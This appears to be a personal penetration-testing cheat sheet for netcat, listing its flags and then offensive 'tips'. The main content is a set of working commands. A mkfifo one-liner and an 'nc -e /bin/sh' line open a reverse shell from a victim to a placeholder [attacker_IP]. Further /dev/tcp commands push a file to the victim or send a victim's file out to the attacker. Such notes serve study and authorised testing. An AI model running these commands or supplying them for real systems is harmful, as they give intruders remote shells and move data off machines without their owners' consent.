🛠️ Netcat
Primary: 01 - Web Security, 01 - Network Security
Secondary: 02 - Data Exfiltration, 02 - Remote Code Execution
Installation
sudo apt install netcatCommon Flags
| Flag | Description |
|---|---|
-l | Listen mode, for inbound connections |
-p | Local port number |
-v | Verbose output |
-n | Numeric-only IP addresses (no DNS lookups) |
-u | UDP mode (default is TCP) |
-z | Zero-I/O mode (used for scanning) |
-w | Timeout for connections and final network reads |
-e | Program to execute after connection (dangerous, often used for reverse shells) |
Tips & Tricks
Reverse Shell
Attacker machine
netcat -nvlp [port]Victim machine
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [attacker_IP] [port] >/tmp/fIf the victim has the correct netcat version installed (one that has -e flag)
nc -e /bin/sh [attacker_IP] [port]File Upload
Attacker machine
netcat -lp [port] < [in_file]Victim machine
cat - < /dev/tcp/[attacker_IP]/[port] > [out_file]
File Download
Attacker machine
nc -l -p [port] > [out_file]Victim machine
cat [in_file] > /dev/tcp/[attacker_IP]/[port]
Related Usage
TABLE creation_date AS "Created"
FROM "05 - Content"
WHERE contains(tools, this.file.link) AND contains(tags, "🚩")
SORT file.name ASC